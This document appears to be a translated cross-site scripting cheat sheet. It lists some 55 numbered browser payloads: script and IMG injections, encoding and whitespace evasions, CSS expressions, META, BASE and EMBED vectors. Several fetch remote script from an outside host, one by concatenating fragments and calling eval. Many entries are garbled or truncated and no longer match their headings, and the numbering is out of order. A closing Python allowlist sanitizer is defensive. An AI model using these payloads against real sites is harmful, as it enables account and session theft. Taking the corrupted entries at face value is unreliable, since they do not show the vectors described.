(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up boxes
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolons or quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multiline injected JavaScript, an extreme XSS example
<IMG SRC=\'#\'" /span>
(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null characters
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null characters 2 (null characters are basically useless in China, because there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes, or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a linked URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>
(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
expression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
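
Added example (Python, not part of the original cheat sheet): an allowlist sanitizer that covers the vector classes listed above. is_safe_url() decodes HTML entities and strips the code points browsers ignore before it looks at the URL scheme, so the case, entity, tab/newline and NUL variants of items 3 to 14 and 17 all reduce to the same rejected scheme; the parser drops unknown tags and every on* attribute (items 1, 99, 21) and discards script/style elements together with their contents. The tag and attribute allowlists, the example.com URLs, and the reading of item 47's "8192-8" as U+2000 to U+2008 are assumptions.

```python
import html
import re
from html.parser import HTMLParser

# Allowlists: anything not named here is dropped (unknown tags, every on* handler).
ALLOWED_TAGS = {"a", "b", "i", "p", "ul", "li", "img", "br"}
URL_ATTRS, PLAIN_ATTRS = {"href", "src"}, {"alt", "title"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}          # "" = relative URL
# Code points browsers skip inside a scheme: NUL plus the ranges item 47 lists
# (1-32, 160, 8192-8 read as 8192-8200, 12288, 65279).
_IGNORED = re.compile("[\x00-\x20\xa0\u2000-\u2008\u3000\ufeff]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.-]*):", re.I)    # RFC 3986 scheme syntax

def is_safe_url(value: str) -> bool:
    decoded = _IGNORED.sub("", html.unescape(value))   # decode, then strip
    m = _SCHEME.match(decoded)
    return (m.group(1).lower() if m else "") in SAFE_SCHEMES

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self._skip = [], None   # _skip: script/style being discarded

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            if tag in ("script", "style"):   # drop their raw text as well
                self._skip = tag
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name in PLAIN_ATTRS or (name in URL_ATTRS and is_safe_url(value)):
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag == self._skip:
            self._skip = None
        elif not self._skip and tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data))   # text is re-encoded on output

def sanitize(fragment: str) -> str:
    p = Sanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)
```

Blocklisting the literal string javascript: would miss every variant above; checking the decoded scheme against an allowlist is what makes the encodings irrelevant.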